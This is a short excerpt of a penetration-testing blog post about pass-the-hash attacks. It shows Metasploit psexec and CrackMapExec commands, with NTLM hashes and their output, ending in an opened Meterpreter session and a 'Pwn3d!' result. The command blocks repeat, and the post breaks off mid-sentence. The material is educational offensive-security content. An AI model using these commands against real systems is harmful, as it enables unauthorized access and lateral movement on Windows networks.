Day: December 13, 2020

Do you remember the first time you passed the hash? It probably went a little something like this:

msf &gt; use exploit/windows/smb/psexec
msf exploit(psexec) &gt; set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
SMBPass =&gt; e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c
msf exploit(psexec) &gt; exploit
[*] Sending stage (719360 bytes)
[*] Meterpreter session 1 opened (192.168.57.133:443 -&gt; 192.168.57.131:1045)

msf > use exploit/windows/smb/psexec

msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c

SMBPass => e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c

msf exploit(psexec) > exploit

[*] Sending stage (719360 bytes)

[*] Meterpreter session 1 opened (192.168.57.133:443 -> 192.168.57.131:1045)

If you are unfamiliar, that is the Metasploit PSexec module being used. Well, nowadays we don’t really do that anymore. You probably pass the hash something like this:

cme smb 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79  -d domain.local
SMB         10.0.0.20     445    PC01      [*] Windows Server 2012 R2 Standard 9600 x64 (name:PC01) (domain:domain.local) (signing:False) (SMBv1:True)
SMB         10.0.0.20     445    PC01       [+] domain.local\user BD1C6503987F8FF006296118F359FA79 (Pwn3d!)

cme smb 10.0.0.20 -u user -H BD1C6503987F8FF006296118F359FA79 -d domain.local

SMB 10.0.0.20 445 PC01 [*] Windows Server 2012 R2 Standard 9600 x64 (name:PC01) (domain:domain.local) (signing:False) (SMBv1:True)

SMB 10.0.0.20 445 PC01 [+] domain.local\user BD1C6503987F8FF006296118F359FA79 (Pwn3d!)

That is CrackMapExec being used to pass…

n00py Blog

Day: <span>December 13, 2020</span>

Alternative ways to Pass the Hash (PtH)

Categories

n00py Blog

Archives

Categories